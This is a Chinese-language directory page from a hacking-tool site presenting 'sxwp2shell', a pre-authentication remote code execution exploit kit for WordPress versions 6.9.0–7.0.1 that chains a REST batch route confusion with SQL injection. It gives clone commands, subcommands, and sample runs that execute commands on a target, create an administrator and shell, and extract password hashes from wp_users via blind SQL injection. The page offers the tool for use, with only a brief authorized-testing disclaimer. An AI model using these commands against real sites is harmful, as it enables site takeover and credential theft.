Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sxwp2shell — WordPress wp2shell 预认证 RCE 漏洞利用工具包(CVE-2026-63030 + CVE-2026-60137) | Kitploit
工具/GitHubGitHub/sentinelxofficial/sxwp2shell
渗透测试框架漏洞扫描器代码分析漏洞利用Web安全
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

WordPress wp2shell 预认证 RCE 漏洞利用工具包(CVE-2026-63030 + CVE-2026-60137)

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

/ / ____ / /()___ ___ / / | |/ / __ / _ / __ / / / __ / _ / / | / / / __/ / / / // / / / / / // | /_/_// //_/// //_/__//|_|

sxwp2shell — 通过 REST API 批处理路由混淆(CVE-2026-63030)+ SQL 注入(CVE-2026-60137)对 WordPress 进行预认证 RCE 漏洞利用。

受影响版本:WP 6.9.0–6.9.4 / 7.0.0–7.0.1


安装

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+,仅需标准库 — 无需 pip 安装。

用法

命令功能
check <url>检测版本、批处理端点、路由混淆与 SQLi
exploit <url>完整 RCE 链路(SQLi → 创建管理员 → shell)
read <url>盲 SQLi 数据提取
scan <file>从文件批量扫描目标,导出 CSV
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

选项

root@kitploit:~
--cmd CMD         Command to execute          (default: id)
--query QUERY     Custom SQL query
-k, --insecure    Skip SSL verification
--proxy PROXY     HTTP proxy
--timeout SEC     Request timeout              (default: 15)
--delay SEC       Delay between requests
--agent AGENT     Custom User-Agent
--no-color        Disable colored output
-o, --output      Save scan results to CSV

免责声明

仅供授权安全测试使用。请阅读 DISCLAIMER.md。

下载工具